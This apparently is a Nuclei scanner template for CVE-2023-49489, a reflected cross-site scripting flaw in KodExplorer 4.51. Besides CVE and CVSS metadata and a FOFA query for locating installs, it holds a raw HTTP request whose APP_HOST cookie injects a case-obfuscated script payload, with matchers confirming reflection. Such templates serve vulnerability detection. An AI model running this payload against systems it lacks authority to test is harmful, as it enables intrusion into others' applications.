id: CVE-2023-49489

info:
  name: KodeExplorer 4.51 - Reflective Cross Site Scripting (XSS)
  author: DhiyaneshDk
  severity: medium
  description: |
    Reflective Cross Site Scripting (XSS) vulnerability in KodExplorer version 4.51, allows attackers to obtain sensitive information and escalate privileges via the APP_HOST parameter at config/i18n/en/main.php.
  reference:
    - https://github.com/kalcaddle/KodExplorer/issues/526
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-49489
    cwe-id: CWE-79
    epss-score: 0.00179
    epss-percentile: 0.37213
    cpe: cpe:2.3:a:kodcloud:kodexplorer:4.51:*:*:*:*:*:*:*
  metadata:
    vendor: kodcloud
    product: kodexplorer
    fofa-query: app="powered-by-kodexplorer"
  tags: cve,cve2024,kodexplorer,xss

http:
  - raw:
      - |
        GET /index.php?user/login HTTP/1.1
        Host: {{Hostname}}
        Cookie: APP_HOST={{RootURL}}/"><ScRiPt%20>alert(document.domain)</ScRiPt>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<ScRiPt >alert(document.domain)</ScRiPt>"
          - "KodExplorer"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"
# digest: 4b0a00483046022100b32b8f021a9dbdaa4917d5feb132c5458d6761cfbd3616cf2a9f15ed2a062ae8022100d215fdf16b6b6aa5409f4e07e26285781a7f7079a4be64676cd2f317838dc27b:922c64590222798bb761d5b6d8e72950